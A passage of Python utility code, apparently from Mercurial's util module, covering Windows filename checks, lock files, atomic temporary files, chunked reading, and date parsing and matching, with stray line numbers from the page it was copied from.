1301 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1302 }
1302 }
1303 _winreservedchars = ':*?"<>|'
1303 _winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % escapestr(c)
        # only the part before the first dot counts for reserved names
        # (e.g. 'con.xml' is rejected)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        # NOTE: "n not in '..'" is a substring test, deliberately letting
        # the special path components '.' and '..' through
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t
1350
1350
# pick the platform-appropriate filename checker and wall-clock timer
if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

# prefer the monotonic high-resolution counter when available (py >= 3.3)
if safehasattr(time, "perf_counter"):
    timer = time.perf_counter
1360
1360
def makelock(info, pathname):
    """Create a lock at pathname whose content is info.

    Prefer a symlink (atomic, readable without opening); fall back to an
    exclusively-created regular file when symlinks are unsupported.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
        # other errors (e.g. filesystem without symlink support) fall
        # through to the regular-file strategy below
    except AttributeError: # no symlink in os
        pass

    ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
    os.write(ld, info)
    os.close(ld)
1373
1373
def readlock(pathname):
    """Return the content of the lock at pathname.

    Reads the symlink target when the lock is a symlink, otherwise the
    contents of the regular lock file (see makelock).
    """
    try:
        return os.readlink(pathname)
    except OSError as why:
        # EINVAL: not a symlink; ENOSYS: symlinks unsupported here
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname)
    r = fp.read()
    fp.close()
    return r
1386
1386
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        # fall back to stat'ing by name for file-like objects
        return os.stat(fp.name)
1393
1393
1394 # File system features
1394 # File system features
1395
1395
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    folded = b.upper()
    if folded == b:
        folded = b.lower()
    if folded == b:
        return True # no evidence against case sensitivity
    try:
        # if the case-folded sibling resolves to the same file, the
        # filesystem folded the case for us: insensitive
        s2 = os.lstat(os.path.join(d, folded))
        if s2 == s1:
            return False
        return True
    except OSError:
        # folded name doesn't exist at all
        return True
1418
1418
# Use google-re2 when available: _re2 stays None until the first compile
# probes whether it actually works, and becomes False when the module is
# missing.
try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False
1424
1424
class _re(object):
    '''Dispatch regexp compilation to re2 when usable, else to the re module.'''

    def _checkre2(self):
        # Verify that the re2 binding actually works (see issue3964) and
        # cache the verdict in the module-level _re2 flag.
        global _re2
        try:
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        unsupported = flags & ~(remod.IGNORECASE | remod.MULTILINE)
        if _re2 and not unsupported:
            # re2 takes flags inline rather than as a parameter
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                # pattern uses a construct re2 cannot handle; fall through
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        return remod.escape
1467
1467
# Module-level singleton through which the rest of the code compiles
# regular expressions (util.re.compile / util.re.escape).
re = _re()
1469
1469
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        # map normcased entry name -> on-disk entry name for 'dir'
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # Note: str.replace() returns a new string, so the result must be
    # assigned back.  Without the assignment the escaping is silently
    # lost and, inside the character classes below, '\/' collapses into
    # an escaped '/' so '\' stops being recognized as a separator.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # separator runs are passed through unchanged
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
1512
1512
def getfstype(dirpath):
    '''Get the filesystem type name from a directory (best-effort)

    Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
    '''
    # pure builds of osutil lack getfstype; report "unsure" in that case
    impl = getattr(osutil, 'getfstype', None)
    if impl is None:
        return None
    return impl(dirpath)
1519
1519
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1 = f2 = fp = None
    try:
        fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fp is not None:
            fp.close()
        # best-effort cleanup of both temporary names
        for name in (f1, f2):
            if name is None:
                continue
            try:
                os.unlink(name)
            except OSError:
                pass
1548
1548
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    if path.endswith(pycompat.ossep):
        return True
    # osaltsep may be empty/None on platforms with a single separator
    return pycompat.osaltsep and path.endswith(pycompat.osaltsep)
1553
1553
def splitpath(path):
    '''Split path by os.sep.

    Deliberately ignores os.altsep: this is nothing more than a named
    spelling of "path.split(os.sep)".  Run os.path.normpath() on the
    argument first if that matters to you.'''
    return path.split(pycompat.ossep)
1561
1561
def gui():
    '''Are we running in a GUI?'''
    if pycompat.sysplatform != 'darwin':
        # elsewhere: Windows always counts, X11 needs a DISPLAY
        return pycompat.iswindows or encoding.environ.get("DISPLAY")
    if 'SSH_CONNECTION' in encoding.environ:
        # handle SSH access to a box where the user is logged in
        return False
    isgui = getattr(osutil, 'isgui', None)
    if isgui:
        # check if a CoreGraphics session is available
        return isgui()
    # pure build; use a safe default
    return True
1576
1576
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    dirname, basename = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % basename, suffix='~',
                                dir=dirname)
    os.close(fd)
    # mkstemp creates files with mode 0600, which is usually not what we
    # want; mirror the original file's mode if it exists, else obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                # source doesn't exist: the empty temp file is the copy
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        # don't leave a half-written temp file behind
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
1617
1617
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        # a missing file is represented by stat=None, not by an error
        try:
            st = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            st = None
        return cls(st)

    @classmethod
    def fromfp(cls, fp):
        return cls(os.fstat(fp.fileno()))

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat.st_ctime == old.stat.st_ctime and
                    self.stat.st_mtime == old.stat.st_mtime)
        except AttributeError:
            # at least one side has stat=None (or isn't a filestat)
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        by confliction between such mtime.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return self.stat.st_ctime == old.stat.st_ctime
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        advanced = (old.stat.st_mtime + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno != errno.EPERM:
                raise
            # utime() on the file created by another user causes EPERM,
            # if a process doesn't have appropriate privileges
            return False
        return True

    def __ne__(self, other):
        return not self == other
1719
1719
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        if self._fp.closed:
            return
        self._fp.close()
        filename = localpath(self.__name)
        oldstat = self._checkambig and filestat.frompath(filename)
        if not (oldstat and oldstat.stat):
            rename(self._tempname, filename)
            return
        rename(self._tempname, filename)
        newstat = filestat.frompath(filename)
        if newstat.isambig(oldstat):
            # stat of changed file is ambiguous to original one
            advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
            os.utime(filename, (advanced, advanced))

    def discard(self):
        if self._fp.closed:
            return
        # remove the temp copy first, then release the file object
        try:
            os.unlink(self._tempname)
        except OSError:
            pass
        self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is None:
            self.close()
        else:
            self.discard()
1782
1782
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty"""
    remove = tryunlink if ignoremissing else unlink
    remove(f)
    # try removing directories that might now be empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
1794
1794
def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno == errno.ENOENT:
            return
        raise
1802
1802
def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as exc:
        if exc.errno == errno.EEXIST:
            return
        if exc.errno != errno.ENOENT or not name:
            raise
        # missing parent: create it first, then retry
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as exc:
            # Catch EEXIST to handle races
            if exc.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)
1830
1830
def readfile(path):
    """Return the entire binary content of the file at path."""
    fp = open(path, 'rb')
    try:
        return fp.read()
    finally:
        fp.close()
1834
1834
def writefile(path, text):
    """Write text to the file at path, replacing any existing content."""
    fp = open(path, 'wb')
    try:
        fp.write(text)
    finally:
        fp.close()
1838
1838
def appendfile(path, text):
    """Append text to the file at path, creating it if necessary."""
    fp = open(path, 'ab')
    try:
        fp.write(text)
    finally:
        fp.close()
1842
1842
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            # re-chunk anything over 1MB into 256KB pieces
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        remaining = l
        pieces = []
        queue = self._queue
        while remaining > 0:
            if not queue:
                # refill the queue with roughly 256KB worth of chunks
                budget = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    budget -= len(chunk)
                    if budget <= 0:
                        break
                if not queue:
                    break

            # Peek at the head chunk rather than popleft()/appendleft():
            # for partially consumed chunks this avoids both the double
            # dequeue mutation and allocating a new str for the remainder.
            chunk = queue[0]
            chunklen = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and remaining >= chunklen:
                remaining -= chunklen
                queue.popleft()
                pieces.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            unread = chunklen - offset

            # Use all of unconsumed part of chunk.
            if remaining >= unread:
                remaining -= unread
                queue.popleft()
                # offset == 0 is handled by the block above, so this
                # slice never degenerates into a full copy via chunk[0:]
                pieces.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                pieces.append(chunk[offset:offset + remaining])
                self._chunkoffset += remaining
                remaining -= unread

        return ''.join(pieces)
1922
1922
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        nbytes = size if limit is None else min(limit, size)
        # a zero-byte request (exhausted limit) short-circuits to falsy
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s
1943
1943
def makedate(timestamp=None):
    '''Return a unix timestamp (or the current time) as a (unixtime,
    offset) tuple based off the local timezone.'''
    if timestamp is None:
        timestamp = time.time()
    if timestamp < 0:
        hint = _("check your clock")
        raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
    # offset = UTC wall clock minus local wall clock, in seconds
    utcnaive = datetime.datetime.utcfromtimestamp(timestamp)
    localnaive = datetime.datetime.fromtimestamp(timestamp)
    delta = utcnaive - localnaive
    tz = delta.days * 86400 + delta.seconds
    return timestamp, tz
1956
1956
def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
    """represent a (unixtime, offset) tuple as a localized time.
    unixtime is seconds since the epoch, and offset is the time zone's
    number of seconds away from UTC.

    >>> datestr((0, 0))
    'Thu Jan 01 00:00:00 1970 +0000'
    >>> datestr((42, 0))
    'Thu Jan 01 00:00:42 1970 +0000'
    >>> datestr((-42, 0))
    'Wed Dec 31 23:59:18 1969 +0000'
    >>> datestr((0x7fffffff, 0))
    'Tue Jan 19 03:14:07 2038 +0000'
    >>> datestr((-0x80000000, 0))
    'Fri Dec 13 20:45:52 1901 +0000'
    """
    t, tz = date or makedate()
    if "%1" in format or "%2" in format or "%z" in format:
        # %1/%2 are Mercurial extensions: hour and minute of the UTC offset
        sign = (tz > 0) and "-" or "+"
        minutes = abs(tz) // 60
        q, r = divmod(minutes, 60)
        format = format.replace("%z", "%1%2")
        format = format.replace("%1", "%c%02d" % (sign, q))
        format = format.replace("%2", "%02d" % r)
    d = t - tz
    # clamp to the signed 32-bit range strftime can reliably handle
    if d > 0x7fffffff:
        d = 0x7fffffff
    elif d < -0x80000000:
        d = -0x80000000
    # Never use time.gmtime() and datetime.datetime.fromtimestamp()
    # because they use the gmtime() system call which is buggy on Windows
    # for negative values.
    t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
    s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
    return s
1992
1992
def shortdate(date=None):
    """turn (timestamp, tzoff) tuple into iso 8631 date."""
    return datestr(date, format='%Y-%m-%d')
1996
1996
def parsetimezone(s):
    """find a trailing timezone, if any, in string, and return a
    (offset, remainder) pair

    The offset is in seconds west of UTC (negative east), or None when no
    timezone is recognized; the remainder has the timezone stripped.
    """

    if s.endswith("GMT") or s.endswith("UTC"):
        return 0, s[:-3].rstrip()

    # Unix-style timezones [+-]hhmm
    if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
        sign = (s[-5] == "+") and 1 or -1
        hours = int(s[-4:-2])
        minutes = int(s[-2:])
        return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()

    # ISO8601 trailing Z
    if s.endswith("Z") and s[-2:-1].isdigit():
        return 0, s[:-1]

    # ISO8601-style [+-]hh:mm
    if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
        s[-5:-3].isdigit() and s[-2:].isdigit()):
        sign = (s[-6] == "+") and 1 or -1
        hours = int(s[-5:-3])
        minutes = int(s[-2:])
        return -sign * (hours * 60 + minutes) * 60, s[:-6]

    return None, s
2024
2024
def strdate(string, format, defaults=None):
    """parse a localized time string and return a (unixtime, offset) tuple.
    if the string cannot be parsed, ValueError is raised."""
    if defaults is None:
        defaults = {}

    # NOTE: unixtime = localunixtime + offset
    offset, date = parsetimezone(string)

    # add missing elements from defaults
    usenow = False # default to using biased defaults
    for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
        part = pycompat.bytestr(part)
        found = [True for p in part if ("%"+p) in format]
        if not found:
            date += "@" + defaults[part][usenow]
            format += "@%" + part[0]
        else:
            # We've found a specific time element, less specific time
            # elements are relative to today
            usenow = True

    timetuple = time.strptime(encoding.strfromlocal(date),
                              encoding.strfromlocal(format))
    localunixtime = int(calendar.timegm(timetuple))
    if offset is None:
        # local timezone
        unixtime = int(time.mktime(timetuple))
        offset = unixtime - localunixtime
    else:
        unixtime = localunixtime + offset
    return unixtime, offset
2057
2057
def parsedate(date, formats=None, bias=None):
    """parse a localized date/time and return a (unixtime, offset) tuple.

    The date may be a "unixtime offset" string or in one of the specified
    formats. If the date already is a (unixtime, offset) tuple, it is returned.

    >>> parsedate(b' today ') == parsedate(
    ...     datetime.date.today().strftime('%b %d').encode('ascii'))
    True
    >>> parsedate(b'yesterday ') == parsedate(
    ...     (datetime.date.today() - datetime.timedelta(days=1)
    ...     ).strftime('%b %d').encode('ascii'))
    True
    >>> now, tz = makedate()
    >>> strnow, strtz = parsedate(b'now')
    >>> (strnow - now) < 1
    True
    >>> tz == strtz
    True
    """
    if bias is None:
        bias = {}
    if not date:
        return 0, 0
    if isinstance(date, tuple) and len(date) == 2:
        return date
    if not formats:
        formats = defaultdateformats
    date = date.strip()

    if date == 'now' or date == _('now'):
        return makedate()
    if date == 'today' or date == _('today'):
        date = datetime.date.today().strftime(r'%b %d')
        date = encoding.strtolocal(date)
    elif date == 'yesterday' or date == _('yesterday'):
        date = (datetime.date.today() -
                datetime.timedelta(days=1)).strftime(r'%b %d')
        date = encoding.strtolocal(date)

    try:
        # fast path: "unixtime offset" pair of integers
        when, offset = map(int, date.split(' '))
    except ValueError:
        # fill out defaults
        now = makedate()
        defaults = {}
        for part in ("d", "mb", "yY", "HI", "M", "S"):
            # this piece is for rounding the specific end of unknowns
            b = bias.get(part)
            if b is None:
                if part[0:1] in "HMS":
                    b = "00"
                else:
                    b = "0"

            # this piece is for matching the generic end to today's date
            n = datestr(now, "%" + part[0:1])

            defaults[part] = (b, n)

        for format in formats:
            try:
                when, offset = strdate(date, format, defaults)
            except (ValueError, OverflowError):
                pass
            else:
                break
        else:
            raise error.ParseError(_('invalid date: %r') % date)
    # validate explicit (probably user-specified) date and
    # time zone offset. values must fit in signed 32 bits for
    # current 32-bit linux runtimes. timezones go from UTC-12
    # to UTC+14
    if when < -0x80000000 or when > 0x7fffffff:
        raise error.ParseError(_('date exceeds 32 bits: %d') % when)
    if offset < -50400 or offset > 43200:
        raise error.ParseError(_('impossible time zone offset: %d') % offset)
    return when, offset
2136
2136
def matchdate(date):
    """Return a function that matches a given date match specifier

    Formats include:

    '{date}' match a given date to the accuracy provided

    '<{date}' on or before a given date

    '>{date}' on or after a given date

    >>> p1 = parsedate(b"10:29:59")
    >>> p2 = parsedate(b"10:30:00")
    >>> p3 = parsedate(b"10:30:59")
    >>> p4 = parsedate(b"10:31:00")
    >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
    >>> f = matchdate(b"10:30")
    >>> f(p1[0])
    False
    >>> f(p2[0])
    True
    >>> f(p3[0])
    True
    >>> f(p4[0])
    False
    >>> f(p5[0])
    False
    """

    def lower(date):
        # earliest timestamp the (possibly partial) spec could mean
        d = {'mb': "1", 'd': "1"}
        return parsedate(date, extendeddateformats, d)[0]

    def upper(date):
        # latest timestamp the spec could mean; probe month lengths
        d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
        for days in ("31", "30", "29"):
            try:
                d["d"] = days
                return parsedate(date, extendeddateformats, d)[0]
            except Abort:
                pass
        d["d"] = "28"
        return parsedate(date, extendeddateformats, d)[0]

    date = date.strip()

    if not date:
        raise Abort(_("dates cannot consist entirely of whitespace"))
    elif date[0] == "<":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '<DATE'"))
        when = upper(date[1:])
        return lambda x: x <= when
    elif date[0] == ">":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '>DATE'"))
        when = lower(date[1:])
        return lambda x: x >= when
    elif date[0] == "-":
        try:
            days = int(date[1:])
        except ValueError:
            raise Abort(_("invalid day spec: %s") % date[1:])
        if days < 0:
            raise Abort(_("%s must be nonnegative (see 'hg help dates')")
                        % date[1:])
        when = makedate()[0] - days * 3600 * 24
        return lambda x: x >= when
    elif " to " in date:
        a, b = date.split(" to ")
        start, stop = lower(a), upper(b)
        return lambda x: x >= start and x <= stop
    else:
        start, stop = lower(date), upper(date)
        return lambda x: x >= start and x <= stop
2212
2212
def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        try:
            flags = 0
            if not casesensitive:
                flags = remod.I
            regex = remod.compile(pattern, flags)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, regex.search
    elif pattern.startswith('literal:'):
        pattern = pattern[8:]

    match = pattern.__eq__

    if not casesensitive:
        ipat = encoding.lower(pattern)
        match = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, match
2271
2271
def shortuser(user):
    """Return a short representation of a user name or email address."""
    # strip, in order: the domain, any "Name <" prefix, the rest of a
    # multi-word name, and anything after the first dot
    f = user.find('@')
    if f >= 0:
        user = user[:f]
    f = user.find('<')
    if f >= 0:
        user = user[f + 1:]
    f = user.find(' ')
    if f >= 0:
        user = user[:f]
    f = user.find('.')
    if f >= 0:
        user = user[:f]
    return user
2287
2287
def emailuser(user):
    """Return the user portion of an email address."""
    f = user.find('@')
    if f >= 0:
        user = user[:f]
    f = user.find('<')
    if f >= 0:
        user = user[f + 1:]
    return user
2297
2297
def email(author):
    '''get email of author.'''
    # take everything between '<' and '>' when present, otherwise the
    # whole string (r=None makes the trailing slice open-ended)
    r = author.find('>')
    if r == -1:
        r = None
    return author[author.find('<') + 1:r]
2304
2304
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display."""
    return encoding.trim(text, maxlength, ellipsis='...')
2308
2308
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity

    unittable is a sequence of (multiplier, divisor, format) triples tried
    in order; the last entry is the fallback.'''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        return unittable[-1][2] % count

    return go
2319
2319
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
      ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
      ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline
2340
2340
# human-readable byte counts, from GB down to raw bytes
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
